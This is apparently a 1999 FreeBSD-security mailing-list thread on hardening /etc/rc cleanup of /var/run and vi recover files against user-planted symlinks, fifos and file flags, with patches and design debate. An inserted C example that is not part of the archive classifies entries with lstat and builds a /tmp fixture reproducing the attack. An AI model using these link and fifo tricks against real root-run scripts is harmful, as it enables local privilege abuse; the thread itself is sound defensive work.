From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199908300215.MAA01056@godzilla.zeta.org.au> Bruce Evans writes: : Clearing superuser flags is wrong. If they were set by root, then root : must want them. If they were set by an intruder then they would have : been fixed appropriately by the previous security pass :-). Is there a better way to turn off all the user flags then? Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 19:17:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.26.10.9]) by hub.freebsd.org (Postfix) with ESMTP id 928571501C for ; Sun, 29 Aug 1999 19:17:45 -0700 (PDT) (envelope-from bde@godzilla.zeta.org.au) Received: (from bde@localhost) by godzilla.zeta.org.au (8.8.7/8.8.7) id MAA01056; Mon, 30 Aug 1999 12:15:18 +1000 Date: Mon, 30 Aug 1999 12:15:18 +1000 From: Bruce Evans Message-Id: <199908300215.MAA01056@godzilla.zeta.org.au> To: dynamo@ime.net, imp@village.org Subject: Re: Not sure if you got it... Cc: security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Index: rc >=================================================================== >RCS file: /home/imp/FreeBSD/CVS/src/etc/rc,v >retrieving revision 1.195 >diff -u -r1.195 rc >--- rc 1999/08/27 23:23:43 1.195 >+++ rc 1999/08/30 00:14:44 
>@@ -129,8 +129,11 @@ > > clean_var() { > if [ ! -f /var/run/clean_var ]; then >+ chflags -R 0 /var/run/* > /dev/null 2>&1 Clearing superuser flags is wrong. If they were set by root, then root must want them. If they were set by an intruder then they would have been fixed appropriately by the previous security pass :-). Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 19:36: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 4431115126 for ; Sun, 29 Aug 1999 19:35:52 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA00687; Sun, 29 Aug 1999 20:35:50 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA00552; Sun, 29 Aug 1999 20:35:05 -0600 (MDT) Message-Id: <199908300235.UAA00552@harmony.village.org> Subject: Re: Not sure if you got it... To: dynamo@ime.net, security@FreeBSD.ORG In-reply-to: Your message of "Sun, 29 Aug 1999 18:18:54 MDT." <199908300018.SAA90400@harmony.village.org> References: <199908300018.SAA90400@harmony.village.org> Date: Sun, 29 Aug 1999 20:35:05 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Actually, here's the isolated fix. I'm working out the issues with chflags a reviewer brought up. I'll be committing this shortly. I wanna do a few more tests with it before making the change. Warner Index: rc =================================================================== RCS file: /home/imp/FreeBSD/CVS/src/etc/rc,v retrieving revision 1.195 diff -u -r1.195 rc --- rc 1999/08/27 23:23:43 1.195 +++ rc 1999/08/30 02:18:24 
@@ -354,7 +360,9 @@ # Unmodified nvi editor backup files either have the # execute bit set or are zero length. Delete them. - if test -x ${i} -o ! -s ${i}; then + # Delete everything that isn't a normal file as well, + # since vi cannot generate them. + if test -x ${i} -o ! -s ${i} -o ! -f ${i}; then rm -f ${i} fi done To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 20: 8:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.26.10.9]) by hub.freebsd.org (Postfix) with ESMTP id 55F1F14D23 for ; Sun, 29 Aug 1999 20:08:20 -0700 (PDT) (envelope-from bde@godzilla.zeta.org.au) Received: (from bde@localhost) by godzilla.zeta.org.au (8.8.7/8.8.7) id NAA06836; Mon, 30 Aug 1999 13:07:57 +1000 Date: Mon, 30 Aug 1999 13:07:57 +1000 
From: Bruce Evans Message-Id: <199908300307.NAA06836@godzilla.zeta.org.au> To: bde@zeta.org.au, imp@village.org Subject: Re: Not sure if you got it... Cc: dynamo@ime.net, security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Is there a better way to turn off all the user flags then? Turning them all off works of course: chflags dump,noopaque,nouappnd,nochg,nouunlnk Is this better :-)? It's not future-proof. I'd prefer `chflags nouflags'. chflags.3 misdescribes the nodump flag. It says that `dump' sets the dump flag. It doesn't say that users can set it. It gives the worst possible example for the use of `no' before a flag by giving `nodump' as an example of turning off a flag. Actually, `dump' clears the nodump flag and `nodump' sets the nodump flag. The `opaque' flag is not mentioned in chflags.3. These bugs are fixed in Lite2. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 20:15:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from dt011n65.san.rr.com (dt010nb9.san.rr.com [204.210.12.185]) by hub.freebsd.org (Postfix) with ESMTP id 12A11157A8 for ; Sun, 29 Aug 1999 20:15:09 -0700 (PDT) (envelope-from Doug@gorean.org) Received: from gorean.org (master [10.0.0.2]) by dt011n65.san.rr.com (8.9.3/8.8.8) with ESMTP id UAA99971; Sun, 29 Aug 1999 20:14:14 -0700 (PDT) (envelope-from Doug@gorean.org) Message-ID: <37C9F705.1041CA95@gorean.org> Date: Sun, 29 Aug 1999 20:14:13 -0700
From: Doug Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.6 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Warner Losh Cc: dynamo@ime.net, security@FreeBSD.ORG Subject: Re: Not sure if you got it... References: <199908300018.SAA90400@harmony.village.org> <199908300235.UAA00552@harmony.village.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warner Losh wrote: > + if test -x ${i} -o ! -s ${i} -o ! -f ${i}; then If you could rewrite this as: if [ -x ${i} -o ! -s ${i} -o ! -f ${i} ]; then it would be one less thing for me to do in my "clean up the rc files" project. :) You can see the examples at http://gorean.org/rcfiles/ Thanks, Doug To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 20:39:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id AA9FD151B7 for ; Sun, 29 Aug 1999 20:39:20 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id VAA00845; Sun, 29 Aug 1999 21:37:35 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id VAA00549; Sun, 29 Aug 1999 21:36:50 -0600 (MDT) Message-Id: <199908300336.VAA00549@harmony.village.org> To: Doug Subject: Re: Not sure if you got it... Cc: dynamo@ime.net, security@FreeBSD.ORG In-reply-to: Your message of "Sun, 29 Aug 1999 20:14:13 PDT." <37C9F705.1041CA95@gorean.org> References: <37C9F705.1041CA95@gorean.org> <199908300018.SAA90400@harmony.village.org> <199908300235.UAA00552@harmony.village.org> Date: Sun, 29 Aug 1999 21:36:50 -0600 
From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <37C9F705.1041CA95@gorean.org> Doug writes: : > + if test -x ${i} -o ! -s ${i} -o ! -f ${i}; then : : If you could rewrite this as: : : if [ -x ${i} -o ! -s ${i} -o ! -f ${i} ]; then : : it would be one less thing for me to do in my "clean up the rc files" : project. :) You can see the examples at http://gorean.org/rcfiles/ OK. I just was following existing practice... I've fixed it in another way, however, using find. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 20:41:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id B64CC156AE for ; Sun, 29 Aug 1999 20:40:46 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id VAA00857; Sun, 29 Aug 1999 21:40:44 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id VAA00562; Sun, 29 Aug 1999 21:39:59 -0600 (MDT) Message-Id: <199908300339.VAA00562@harmony.village.org> To: Bruce Evans Subject: Re: Not sure if you got it... Cc: dynamo@ime.net, security@FreeBSD.ORG In-reply-to: Your message of "Mon, 30 Aug 1999 13:07:57 +1000." <199908300307.NAA06836@godzilla.zeta.org.au> References: <199908300307.NAA06836@godzilla.zeta.org.au> Date: Sun, 29 Aug 1999 21:39:59 -0600 
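The predicate the thread converges on for the recover-file loop, written out as an added example (this is not the committed /etc/rc change nor any FreeBSD code): an entry of /var/tmp/vi.recover is processed only if it is a regular file according to lstat(2), readable, non-empty and not executable. `test -f` stats through a symbolic link, so the reported link to a tty is rejected only because a tty is not a regular file, and a link to a regular file would pass; find's `-type f` without -L is evaluated on the link itself, and the C below does the same with lstat. The fixture directory, its file names and their contents are constructed for the demonstration; it assumes /tmp is writable.

```c
#define _XOPEN_SOURCE 700
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

enum verdict { SKIP = 0, DELETE = 1, RECOVER = 2 };

/* Classify one entry of the recover directory the way the rc loop should.
 * lstat(2) is used on purpose: `test -f` stats through a symbolic link, so a
 * user-planted link to a regular file passes it, and a link to a tty is only
 * rejected because a tty is not a regular file.  Never looking through the
 * link closes both cases. */
enum verdict classify(const char *path)
{
    struct stat st;

    if (lstat(path, &st) == -1 || !S_ISREG(st.st_mode))
        return SKIP;                 /* link, fifo, device, directory: not vi's */
    if (access(path, R_OK) == -1)
        return SKIP;                 /* the script's `test -r` */
    if (st.st_size == 0 || (st.st_mode & (S_IXUSR | S_IXGRP | S_IXOTH)))
        return DELETE;               /* unmodified nvi backup: zero length or +x */
    return RECOVER;                  /* plain, readable, non-empty: a real recover file */
}

/* Convenience for callers that hold the directory and the entry separately. */
enum verdict classify_in(const char *dir, const char *name)
{
    char path[4096];

    snprintf(path, sizeof path, "%s/%s", dir, name);
    return classify(path);
}

static int make_file(const char *dir, const char *name, const char *body, mode_t mode)
{
    char path[4096];
    int fd;

    snprintf(path, sizeof path, "%s/%s", dir, name);
    fd = open(path, O_WRONLY | O_CREAT | O_EXCL, mode);
    if (fd == -1)
        return -1;
    if (body != NULL && write(fd, body, strlen(body)) != (ssize_t)strlen(body)) {
        close(fd);
        return -1;
    }
    return close(fd);
}

/* Constructed fixture (assumption: /tmp is writable): one entry of each kind
 * the thread argues about.  Built once; returns the directory, NULL on error. */
const char *fixture_dir(void)
{
    static char dir[] = "/tmp/virecover.XXXXXX";
    static int ready;
    char path[4096];

    if (ready)
        return dir;
    if (mkdtemp(dir) == NULL)
        return NULL;
    if (make_file(dir, "recover.good", "X-vi-recover-path: /tmp/vi.fake\n", 0600) == -1 ||
        make_file(dir, "recover.empty", NULL, 0600) == -1 ||
        make_file(dir, "recover.exec", "junk\n", 0700) == -1)
        return NULL;
    /* The attack from the thread: a user-created link.  Pointed at a regular
     * file here so that a stat-based `test -f` would have accepted it. */
    snprintf(path, sizeof path, "%s/recover.link", dir);
    if (symlink("recover.good", path) == -1)
        return NULL;
    /* Opening this for reading, as `sendmail -t < $i` would, blocks forever. */
    snprintf(path, sizeof path, "%s/recover.fifo", dir);
    if (mkfifo(path, 0600) == -1)
        return NULL;
    ready = 1;
    return dir;
}

int main(void)
{
    static const char *names[] = { "recover.good", "recover.empty", "recover.exec",
                                   "recover.link", "recover.fifo" };
    static const char *label[] = { "skip", "delete", "recover" };
    const char *dir = fixture_dir();
    size_t i;

    if (dir == NULL) {
        perror("fixture");
        return 1;
    }
    for (i = 0; i < sizeof names / sizeof names[0]; i++)
        printf("%-14s %s\n", names[i], label[classify_in(dir, names[i])]);
    return 0;
}
```

When this runs as root, which is the situation in rc, access() never fails, so the protection comes entirely from lstat and S_ISREG, not from permission checks; a link or a fifo is never opened, whatever it points at.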
From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199908300307.NAA06836@godzilla.zeta.org.au> Bruce Evans writes: : >Is there a better way to turn off all the user flags then? : : Turning them all off works of course: : : chflags dump,noopaque,nouappnd,nochg,nouunlnk : : Is this better :-)? It's not future-proof. I'd prefer `chflags nouflags'. Any objections to chflags nouflags going into the tree, modulo problems with the actual code that does it? I'd also like to have a new flag to rm. -F. One -F will be chflags nouflags foo ; rm -f foo while two -F will be chflags 0 foo ; rm -f foo This is mostly for convenience, since otherwise I have to uglify the rc scripts with chflags. Comments on this idea as well? I've gotten antipathy in the past when I've asked. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 30 11: 3:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 04ACB158AB for ; Mon, 30 Aug 1999 11:03:20 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id LAA66101; Mon, 30 Aug 1999 11:01:49 -0700 (PDT) (envelope-from freebsd) 
From: "Rodney W. Grimes" Message-Id: <199908301801.LAA66101@gndrsh.dnsmgr.net> Subject: Re: Not sure if you got it... In-Reply-To: <199908300339.VAA00562@harmony.village.org> from Warner Losh at "Aug 29, 1999 09:39:59 pm" To: imp@village.org (Warner Losh) Date: Mon, 30 Aug 1999 11:01:49 -0700 (PDT) Cc: bde@zeta.org.au (Bruce Evans), dynamo@ime.net, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > In message <199908300307.NAA06836@godzilla.zeta.org.au> Bruce Evans writes: > : >Is there a better way to turn off all the user flags then? > : > : Turning them all off works of course: > : > : chflags dump,noopaque,nouappnd,nochg,nouunlnk > : > : Is this better :-)? It's not future-proof. I'd prefer `chflags nouflags'. > > Any objections to chflags nouflags going into the tree, modulo > problems with the actual code that does it? I don't have a problem with that. > > I'd also like to have a new flag to rm. -F. One -F will be > chflags nouflags foo ; rm -f foo > while two -F will be > chflags 0 foo ; rm -f foo I have a problem with this, it means updating 1 more chunk of code should the set of items in uflags change. 
-- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 30 11: 8:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 59783150B0 for ; Mon, 30 Aug 1999 11:08:14 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id MAA03715; Mon, 30 Aug 1999 12:08:01 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA04962; Mon, 30 Aug 1999 12:07:23 -0600 (MDT) Message-Id: <199908301807.MAA04962@harmony.village.org> To: "Rodney W. Grimes" Subject: Re: Not sure if you got it... Cc: bde@zeta.org.au (Bruce Evans), dynamo@ime.net, security@FreeBSD.ORG In-reply-to: Your message of "Mon, 30 Aug 1999 11:01:49 PDT." <199908301801.LAA66101@gndrsh.dnsmgr.net> References: <199908301801.LAA66101@gndrsh.dnsmgr.net> Date: Mon, 30 Aug 1999 12:07:23 -0600 
From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199908301801.LAA66101@gndrsh.dnsmgr.net> "Rodney W. Grimes" writes: : > In message <199908300307.NAA06836@godzilla.zeta.org.au> Bruce Evans writes: : > : >Is there a better way to turn off all the user flags then? : > : : > : Turning them all off works of course: : > : : > : chflags dump,noopaque,nouappnd,nochg,nouunlnk : > : : > : Is this better :-)? It's not future-proof. I'd prefer `chflags nouflags'. : > : > Any objections to chflags nouflags going into the tree, modulo : > problems with the actual code that does it? : : I don't have a problem with that. : : > : > I'd also like to have a new flag to rm. -F. One -F will be : > chflags nouflags foo ; rm -f foo : > while two -F will be : > chflags 0 foo ; rm -f foo : : I have a problem with this, it means updating 1 more chunk of code : should the set of items in uflags change. I was going to define something like UF_USERFLAGS and SF_SYSFLAGS as well... Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 30 11:14: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id A2F3C15C65 for ; Mon, 30 Aug 1999 11:13:28 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id LAA16174; Mon, 30 Aug 1999 11:12:05 -0700 (PDT) (envelope-from dillon) Date: Mon, 30 Aug 1999 11:12:05 -0700 (PDT) 
From: Matthew Dillon Message-Id: <199908301812.LAA16174@apollo.backplane.com> To: "Rodney W. Grimes" Cc: imp@village.org (Warner Losh), bde@zeta.org.au (Bruce Evans), dynamo@ime.net, security@FreeBSD.ORG Subject: Re: Not sure if you got it... References: <199908301801.LAA66101@gndrsh.dnsmgr.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :> :> Any objections to chflags nouflags going into the tree, modulo :> problems with the actual code that does it? : :I don't have a problem with that. : :> :> I'd also like to have a new flag to rm. -F. One -F will be :> chflags nouflags foo ; rm -f foo :> while two -F will be :> chflags 0 foo ; rm -f foo : :I have a problem with this, it means updating 1 more chunk of code :should the set of items in uflags change. : :-- :Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net Maybe what we need to do is allow a umask to be set for the flag bits in the mount. So, for example, you would be able to specify which flag bits are allowed to be set on a mount-by-mount basis (both user and system). Otherwise we may wind up spending the next year trying to 'fix' security holes in scripts related to the flag bits. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 30 11:14:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 46CD91591B for ; Mon, 30 Aug 1999 11:14:34 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 6551A1C14; Mon, 30 Aug 1999 13:17:24 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id 55BA53815; Mon, 30 Aug 1999 13:17:24 -0400 (EDT) Date: Mon, 30 Aug 1999 13:17:24 -0400 (EDT) 
From: Bill Fumerola To: "Rodney W. Grimes" Cc: Warner Losh , Bruce Evans , dynamo@ime.net, security@FreeBSD.ORG Subject: Re: Not sure if you got it... In-Reply-To: <199908301801.LAA66101@gndrsh.dnsmgr.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 30 Aug 1999, Rodney W. Grimes wrote: > > I'd also like to have a new flag to rm. -F. One -F will be > > chflags nouflags foo ; rm -f foo > > while two -F will be > > chflags 0 foo ; rm -f foo > > I have a problem with this, it means updating 1 more chunk of code > should the set of items in uflags change. Or updating rc if uflags change. -- - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 30 12:12: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id EA9FA14E42 for ; Mon, 30 Aug 1999 12:12:04 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id MAA66317; Mon, 30 Aug 1999 12:09:38 -0700 (PDT) (envelope-from freebsd) 
From: "Rodney W. Grimes" Message-Id: <199908301909.MAA66317@gndrsh.dnsmgr.net> Subject: Re: Not sure if you got it... In-Reply-To: <199908301807.MAA04962@harmony.village.org> from Warner Losh at "Aug 30, 1999 12:07:23 pm" To: imp@village.org (Warner Losh) Date: Mon, 30 Aug 1999 12:09:38 -0700 (PDT) Cc: bde@zeta.org.au (Bruce Evans), dynamo@ime.net, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > In message <199908301801.LAA66101@gndrsh.dnsmgr.net> "Rodney W. Grimes" writes: > : > In message <199908300307.NAA06836@godzilla.zeta.org.au> Bruce Evans writes: > : > : >Is there a better way to turn off all the user flags then? > : > : > : > : Turning them all off works of course: > : > : > : > : chflags dump,noopaque,nouappnd,nochg,nouunlnk > : > : > : > : Is this better :-)? It's not future-proof. I'd prefer `chflags nouflags'. > : > > : > Any objections to chflags nouflags going into the tree, modulo > : > problems with the actual code that does it? > : > : I don't have a problem with that. > : > : > > : > I'd also like to have a new flag to rm. -F. One -F will be > : > chflags nouflags foo ; rm -f foo > : > while two -F will be > : > chflags 0 foo ; rm -f foo > : > : I have a problem with this, it means updating 1 more chunk of code > : should the set of items in uflags change. > > I was going to define something like UF_USERFLAGS and SF_SYSFLAGS as > well... It still goes against my ingrained Unix ideal that says each command should do one thing and one thing only, but do it really well. If you need to do 2 things you should glue 2 commands together. Have we all fallen off the rocker and forgotten this is one of the design concepts behind unix, and one of the things that has made it such a powerful operating system that has withstood the test of time over and over?
I was sick when they added -R to cp (why did they do that anyway?), yes I got even sicker that once we did that we had to add -v, yes, I am an old fart who is set in his ways ... :-) -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 30 12:14:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id D834F15357 for ; Mon, 30 Aug 1999 12:14:38 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id MAA66330; Mon, 30 Aug 1999 12:13:04 -0700 (PDT) (envelope-from freebsd) 
From: "Rodney W. Grimes" Message-Id: <199908301913.MAA66330@gndrsh.dnsmgr.net> Subject: Re: Not sure if you got it... In-Reply-To: <199908301812.LAA16174@apollo.backplane.com> from Matthew Dillon at "Aug 30, 1999 11:12:05 am" To: dillon@apollo.backplane.com (Matthew Dillon) Date: Mon, 30 Aug 1999 12:13:04 -0700 (PDT) Cc: imp@village.org (Warner Losh), bde@zeta.org.au (Bruce Evans), dynamo@ime.net, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > :> > :> Any objections to chflags nouflags going into the tree, modulo > :> problems with the actual code that does it? > : > :I don't have a problem with that. > : > :> > :> I'd also like to have a new flag to rm. -F. One -F will be > :> chflags nouflags foo ; rm -f foo > :> while two -F will be > :> chflags 0 foo ; rm -f foo > : > :I have a problem with this, it means updating 1 more chunk of code > :should the set of items in uflags change. > : > :-- > :Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net > > Maybe what we need to do is allow a umask to be set for the flag bits > in the mount. So, for example, you would be able to specify which flag > bits are allowed to be set on a mount-by-mount basis (both user and > system). Otherwise we may wind up spending the next year trying to > 'fix' security holes in scripts related to the flag bits. Hummmm.. or add a flag bit that says flags can't be set below this directory level? Domain/OS can do a similar thing with its ACLs. Mount points are too coarse-grained for this problem, /var/tmp is often just a part of /var. I might want append-only flags on much of /var/log, but disallow flags in /var/{run,tmp}.
-- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 30 12:15: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 6DC43157CF for ; Mon, 30 Aug 1999 12:14:59 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id NAA03980; Mon, 30 Aug 1999 13:14:58 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id NAA05430; Mon, 30 Aug 1999 13:14:21 -0600 (MDT) Message-Id: <199908301914.NAA05430@harmony.village.org> To: "Rodney W. Grimes" Subject: Re: Not sure if you got it... Cc: bde@zeta.org.au (Bruce Evans), dynamo@ime.net, security@FreeBSD.ORG In-reply-to: Your message of "Mon, 30 Aug 1999 12:09:38 PDT." <199908301909.MAA66317@gndrsh.dnsmgr.net> References: <199908301909.MAA66317@gndrsh.dnsmgr.net> Date: Mon, 30 Aug 1999 13:14:21 -0600 
From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199908301909.MAA66317@gndrsh.dnsmgr.net> "Rodney W. Grimes" writes: : It still goes against my ingrained Unix ideal that says each command : should do one thing and one thing only, but do it really well. If you : need to do 2 things you should glue 2 commands together. Have we all : fallen off the rocker and forgotten this is one of the design concepts : behind unix, and one of the things that has made it such a powerful : operating system that has withstood the test of time over and over? rm -f integrates rm and chmod. -f is defined to be "force removal of file" which should imply removing user flags, but doing so would present certain difficulties. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 30 12:15:27 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id BDB0F15855 for ; Mon, 30 Aug 1999 12:15:22 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id MAA66340; Mon, 30 Aug 1999 12:14:26 -0700 (PDT) (envelope-from freebsd)
From: "Rodney W. Grimes" Message-Id: <199908301914.MAA66340@gndrsh.dnsmgr.net> Subject: Re: Not sure if you got it... In-Reply-To: from Bill Fumerola at "Aug 30, 1999 01:17:24 pm" To: billf@jade.chc-chimes.com (Bill Fumerola) Date: Mon, 30 Aug 1999 12:14:26 -0700 (PDT) Cc: imp@village.org (Warner Losh), bde@zeta.org.au (Bruce Evans), dynamo@ime.net, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Mon, 30 Aug 1999, Rodney W. Grimes wrote: > > > > I'd also like to have a new flag to rm. -F. One -F will be > > > chflags nouflags foo ; rm -f foo > > > while two -F will be > > > chflags 0 foo ; rm -f foo > > > > I have a problem with this, it means updating 1 more chunk of code > > should the set of items in uflags change. > > Or updating rc if uflags change. chflags nouflags foo in /etc/rc* would not need to change if uflags changes. chflags might, but not /etc/rc* -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 30 19: 1:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.26.10.9]) by hub.freebsd.org (Postfix) with ESMTP id 0228514C08 for ; Mon, 30 Aug 1999 19:01:28 -0700 (PDT) (envelope-from 